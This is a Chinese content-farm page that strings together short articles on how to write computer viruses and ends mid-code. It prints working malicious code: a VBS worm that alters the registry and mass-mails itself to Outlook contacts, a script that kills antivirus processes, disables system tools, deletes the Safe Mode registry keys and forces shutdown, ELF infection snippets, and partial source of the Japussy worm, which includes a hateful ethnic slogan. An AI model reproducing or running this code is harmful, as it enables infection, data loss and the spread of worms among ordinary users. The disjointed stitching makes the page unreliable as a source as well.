为您找到与病毒代码编写相关的共200个结果:
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
编写电脑病毒代码是建立在对系统与网络充分的理解基础之上的,从有病毒以来每一种经典病毒无一不是智力的杰作这就是说就是你对系统网络有充分了解没有过人的思维智慧依旧编写不了病毒。如果你说就像写一个简单的那么一个del删除指令在没经过用户允许就删除了文件就算病毒了。
编写电脑病毒代码是什么
电脑病毒是编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒(Computer Virus)。具有破坏性,复制性和传染性。
电脑病毒有哪些
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
电脑病毒的危害
电脑病毒的直接影响是会对电脑资源产生破坏和损失,带来相应的经济损失,但最令人担心的是将会对社会产生严重的恐慌,引发社会动荡。回想上世纪八十年代,蠕虫病毒造成了美国的计算机网络堵塞,其影响的范围和效果让全世界为之震惊。同时也让电脑病毒开始受到重视,成为计算机研究的一个领域。
其次如果你想学习制作电脑病毒 你就需要学习计算机语言中的汇编语言和C语言,因为一个简单的电脑病毒编写绝大多数代码都可以用这两种语言来完成。在编写电脑病毒时,我们还需要对电脑的结构和运行过程等方面有一定了解,这样才能让电脑病毒制作更加成功。如果你对这些基础都不牢固也有办法,现在网络上有一些简单的病毒制造机,也就是一类病毒编写软件。
电脑病毒的危害
其实不同的病毒造成的危害不同,例如有利用系统漏洞进入电脑的病毒,这种病毒对于电脑的破坏性是有致命的,可能会直接导致你电脑崩溃,将你电脑里面的所有数据清空,你想想如果你电脑里面有公司资料,或者一些自己珍贵的文件,一旦中了这种病毒也许你就要被老板炒鱿鱼了
浏览量:3
下载量:0
时间:
计算机病毒是编写或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。下面由读文网小编给你做出详细的电脑病毒编写介绍!希望对你有帮助!
1计算机病毒的特征是传播性,非授权性,隐藏性,潜伏性,破坏性,不可预见性,可触发性。
2计算机病毒根据感染方式可以分为感染可执行文件的病毒,感染引导区的病毒,感染文档文件的病毒。
3现阶段的反病毒技术有特征码扫描,启发式扫描,虚拟机技术,主动防御技术,自免疫技术,云杀毒等等。
4一个简单病毒的模块包含,触发模块,传播模块,表现模块。
5学习计算机病毒,要了解硬盘结构,计算机扇区结构,计算机系统启动过程,文件系统,计算机引导过程。
6汇编语言和C语言用的会比较多。
7现阶段也有一些简单病毒制造机,此类软件可以在网上找到。
一个是要理解计算机系统,文件格式。
一个是要精通编程,汇编和C。
看过“ 电脑病毒编写步骤”人还看了:
浏览量:2
下载量:0
时间:
电脑中了病毒想从它的源代码入手怎么办呢!有读文网小编在,下面由读文网小编给你做出详细的电脑病毒源代码介绍!希望对你有帮助!
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerosetfolders",1,"reg_dword" '修改注册表,禁止控制面板
r.regwrite "hklmsoftwareclasses.reg","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption","警告" '设置开机提示框标题
r.regwrite "hklmsoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application" '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" '邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是对internet explore 选项的恶意修改
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol paneladvanced",1,"reg_dword" '修改注册表,禁止更改高级页设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelcache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelautoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhomepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelhistory",1,"reg_dword" '修改注册表,禁止更改历史记录设置
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelconnwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelsecuritytab",1,"reg_dword" '修改注册表,禁止更改安全项
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorercontrol panelesetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerestrictionsoviewsource",1,"reg_dword" '修改注册表,禁止查看源文件
r.regwrite "hkcusoftwarepoliciesmicrosoftinternet explorerinfodeliveryestrictionsoaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划
r.regwrite "hkcusoftwaremicrosoftwindowscurrentversionpoliciesexplorerofilemenu",1,"reg_dword" '修改注册表,禁止“文件”菜单
看了“电脑病毒源代码介绍”文章的还看了:
浏览量:2
下载量:0
时间:
在网络中,计算机病毒能不断复制并造成严重的破坏,然而它们会如何为繁衍而寻找配偶呢?在新出版的《进化》杂志上,计算机病毒可通过计算机程序配对繁衍。下面由读文网小编给你做出详细的修改代码可减少电脑病毒进化介绍!希望对你有帮助!
完美的计算机系统是不存在的,它的漏洞衍生出了神秘的计算机病毒。想想吧,只是一段信息,却在它的生存空间(也就是网络环境)中存活、自我复制、繁衍甚至进化,直如生命一般。只是它本身少了个承载体,要借着别人的实体发威。
而今美国学者拿出了生物择偶方式来类比病毒的配对,使得这些代码更沾了点生老病死的味道,就差能喜怒哀乐了。不过这真说不好,就像我们的大自然,你怎知它不是一台巨型计算机呢?
看了“修改代码可减少电脑病毒进化介绍”文章的还看了:
浏览量:4
下载量:0
时间:
在很多人(主要是对计算机一无所知或者一知半解的人)看来,能编写出计算机病毒就理所当然是计算机高手了。下面由读文网小编给你做出详细的电脑病毒编写方法介绍!希望对你有帮助!
在很多人(主要是对计算机一无所知或者一知半解的人)看来,能编写出计算机病毒就理所当然是计算机高手了。沈阳一位网友认为,杀毒厂商的技术不能及时遏止病毒,说明病毒作者的技术在某些领域已远远高出他们了。其实,这就像警察破案,再高明的警察也不能遏制所有的犯罪,他只能在案件发生后去侦破。怎么能认为杀毒厂商不能及时遏止病毒就是技不如人呢?有几个杀毒软件用户自己能判断出是病毒并及时上报给杀毒软件公司呢? 东莞一位网友说,为什么这样的人才没有被社会所用?中国的软件人才是那么匮乏,这样的人为什么没有走正道?这种观点的潜台词就是计算机病毒编写者就是软件高手。你用Word把一篇文章加密,只要密码够复杂,保管连比尔盖茨也解不开(除非软件留有后洞,就像当年UCDOS下的WPS那样)。如果真有很高的水平,就去像菲利普·卡兹(Philip Katz)那样编写让大家都受益的软件,你自己还可以从中获得注册费。名利双收,何乐而不为?
对于杭州某网络公司的做法,我认为很不妥。网络公司可以以适当高于市场行情的薪资聘用作者,但以百万年薪似有炒作之嫌。而且此先河一开,会形成计算机业内一个潜规则:编写计算机病毒可得高薪。只会促使更多的人去编写计算机病毒,不仅对谁都没有好处,还会让人怀疑杀毒软件公司是自己在编写病毒再用自己的软件去杀毒。
计算机病毒并不可怕,之所以泛滥,是因为很多用户太不注意了!不少用户根本不知道什么是计算机病毒,或者不愿意去了解,完全寄希望于杀毒软件。(想想看,有几个人平时用U盘时会时常检查U盘里有没有Autorun.inf这个隐藏文件?这可是很简单的啊!)只要稍加注意,就能避免病毒传播,并不需要什么深奥的知识。不要把计算机病毒看得高深莫测,把病毒编写者看成计算机高手,这样只会形成恶性循环,造成计算机行业的不良发展
看了“电脑病毒编写方法介绍”文章的还看了:
浏览量:2
下载量:0
时间:
写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,同时向对这方面有兴趣的朋友做一个简单的介绍。下面由读文网小编给你做出详细的Linux病毒原型代码介绍!希望对你有帮助!
1 ELF文件执行流程重定向和代码插入
在ELF文件感染的问题上,ELF Infector与病毒传播时调用的infect_virus思路是一样的:
* 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉ELF文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要注意文本段增加长度的对齐问题,见ELF文档中的描述:
p_align
As ``Program Loading'' later in this part describes, loadable
process segments must have congruent values for p_vaddr and
p_offset, modulo the page size.
* 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向:
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
2 病毒代码如何返回到真正的ELF文件入口
方法技巧应该很多,这里采用的方法是PUSH+RET组合:
__asm__ volatile (
…
"return:"
"push $0xAABBCCDD" /* push ret_addr */
"ret"
::);
其中0xAABBCCDD处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程序来填写。
看了“Linux病毒原型代码”文章的还看了:
浏览量:3
下载量:0
时间:
你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由读文网小编给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
修改系统时间:
置现行时间 (到时间 (“8888年8月8日”))
禁用任务管理器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, 0)
禁用注册表:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableregistrytools”, 1)
隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, 1)
隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:
写注册项 (3, “SoftWare Microsoft Windows CurrentVersion PoliciesWinOldAppDisabled”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
OVER360防御:
写注册项 (4, “SOFTWARE360SafesafemonExecAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonMonAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonSiteAccess”, 0)
写注册项 (4, “SOFTWARE360SafesafemonUDiskAccess”, 0)
结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
隐藏所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives”, 4294967295)
禁止所有驱动器:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive”, 4294967295)
隐藏文件夹选项:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, 1)
将桌面对象隐藏:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop”, 1)
隐藏开始中的关机:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, 1)
这条有两种情况。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项
写注册项 (3, “SoftwarePoliciesMicrosoftWindowsSystemDisableCMD”, 1)
隐藏主页选项组:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage”, 1)
隐藏IE文件菜单:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFileMenu”, 1)
隐藏收藏夹菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoFavorites”, 1)
禁用IE打印功能:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoPrinting”, 1)
隐藏Internet选项:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserOptions”, 1)
禁止IE查看源文件:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoViewSource”, 1)
禁用IE下载功能:
写注册项 (3, “SoftwareMicrosoftWindowsCurrentVersionInterner Settingsones31803”, 3)
禁止右键关联菜单:
写注册项 (3, “SoftwarePoliciesMicrosoftInternet ExplorerRestrictionsNoBrowserContextMenu”, 1)
修改文件关联:
写注册项 (1, “.txt”, “jpegfile”)
写注册项 (1, “.inf”, “jpegfile”)
写注册项 (1, “.reg”, “jpegfile”)
写注册项 (1, “.exe”, “jpegfile”)
无法进入安全模式:
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{36FC9E60-C465-11CF-8056-444553540000}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E965-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E967-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E969-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96A-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E96F-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E973-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E974-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E975-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E977-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97B-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E97D-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{4D36E980-E325-11CE-BFC1-08002BE10318}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{71A27CDD-812A-11D0-BEC7-08002BE2092F}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAFD”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkAppMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBase”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBoot file system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkBrowser”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkCryptSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDcomLaunch”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDhcp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmadmin”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmboot.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmio.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmload.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdmserver”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkDnsCache”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkEventLog”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFile system”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkFilter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkHelpSvc”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkip6fw.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkipnat.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanServer”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLanmanWorkstation”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkLmHosts”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkMessenger”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNDIS Wrapper”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOS”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBIOSGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetBT”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetDDEGroup”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetlogon”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetMan”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNetworkProvider”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNtLmSsp”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPCI Configuration”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPlugPlay”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP Filter”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPNP_TDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkPrimary disk”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpcdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpdd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpwd.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdsessmgr”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkRpcSs”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSCSI Class”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksermouse.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSharedAccess”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworksr.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSRService”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkStreams Drivers”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkSystem Bus Extender”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTcpip”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkTDI”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdpipe.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkdtcp.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkermservice”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvga.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkvgasave.sys”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWinMgmt”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkWZCSVC”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetworkNdisuio”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBootNetwork”)
删除注册项 (4, “SYSTEMCurrentControlSetControlSafeBoot”)
关机:
关闭系统 (2, 假)
关机2:
运行(“shutdown -s -f ”)
以上是读文网小编给朋友们做出的总结!希望对你们有帮助!
看了“最简单的电脑病毒代码是什么”文章的还看了:
浏览量:2
下载量:0
时间:
恶意代码危害是非常严重的,病毒危害也差不多,那么到底什么是恶意代码和病毒呢?下面由读文网小编给你做出详细的恶意代码和病毒介绍!希望对你有帮助!
是一种可以自我复制的完全独立的程序,它的传播不需要借助被感染主机中的其他程序。蠕虫的自我复制不象其他的病毒,它可以自动创建与它的功能完全相同的副本,并在没人干涉的情况下自动运行。蠕虫是通过系统存在的漏洞和设置的不安全性(例如:设置共享)来进行入侵的。它的自身特性可以使它以及快的速度传输(在几秒中内从地球的一端传送到另一端)。其中比较典型的有Blaster和SQL Slammer。
浏览量:2
下载量:0
时间:
恶意代码是构成病毒的主要因素,我们要怎么样才能防护恶意代码清除点病毒呢?下面由读文网小编给你做出详细的防护恶意代码清除电脑病毒方法介绍!希望对你有帮助!
问题揭示
我们来看看wincfg.Exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的语句
看了“怎么样防护恶意代码清除电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
对于电脑病毒代码,你并不陌生吧?危害着我们电脑!下面由读文网小编给你做出详细的电脑病毒代码说法介绍!希望对你有帮助!
编制或者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码被称为计算机病毒,具有破坏性,复制性和传染性。 由人编制而成的一段程序。 组成包括,潜伏机制,传染机制,触发机制。
浏览量:2
下载量:0
时间:
在这个浩瀚的宇宙上,什么人都有,为什么有些人喜欢编写电脑病毒呢?下面由读文网小编给你做出详细的编写电脑病介绍介绍!希望对你有帮助!
病毒的最大特点就是自我复制,从病毒的分类来说有很多种,这里我们将介绍最流行的附加式
病毒,它通过对正常的文件进行改写,增加来实现其自我复制的目的。
从程序的角度来说,我们要做的事情有两件:
1,让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序,
使它具备继续复制的能力。
2,在一定条件下使其产生某种发作效果。
其实第一件事情实际上可以看成对文件进行复制,把病毒源文件的功能函数全部放到被感染
文件的最后,同时在被感染文件中调用这个函数
下面给出c语言的实现过程:
1,主程序调用病毒功能函数
2,病毒功能函数读取查找同目录下所有c文件;
3,找到一个(被感染c文件),打开它,并且将此文件全部读取到数组变量;
4,重新创建一个同名文件(被感染c文件)
5,数组变量写回这个被感染c文件,同时将病毒源文件所需要的头文件,病毒功能函数
调用语句写入;
6,打开病毒源文件,将病毒功能函数全部写到被感染c文件的最后;
这样一个简单的c语言伪病毒virus.c就完成了
运行程序后其内容变化另保存为after_virus.c
此时,如果我们将1.c文件用A盘复制到其他机器或者Email给别人,结果
他们一运行又感染了他们保存1.c文件目录下所有c文件
对于第二件事情-------“发作效果”,这里只用printf语句警告了一下,当然你
完全可以写一个TSR驻留函数
其实,这个程序勉强可以叫做病毒
看了“为什么有人要编写电脑病毒”文章的还看了:
浏览量:2
下载量:0
时间:
电脑病毒不会无缘无故就产生的,一般都是人为的,那么是用什么语言编写的呢?下面由读文网小编给你做出详细的电脑病毒是用什么语言编写说明介绍!希望对你有帮助!
一般来说vb,vc++,delphi,等等如果想再高级一些,部分可以用汇编(强!),有的全部用汇编(更强!),那是DOS时代的,现在全部用汇编几乎不可能了(除非你是牛人或病毒什么功能也没有)
浏览量:2
下载量:0
时间:
万恶的计算机病毒也是有源代码组成的,那么计算机病毒代码长什么样呢?下面由读文网小编给你做出详细的计算机病毒源代码介绍!希望对你有帮助!
把下面这段代码复制到记事本里,保存为文本文件
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
熊猫烧香
ogram Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
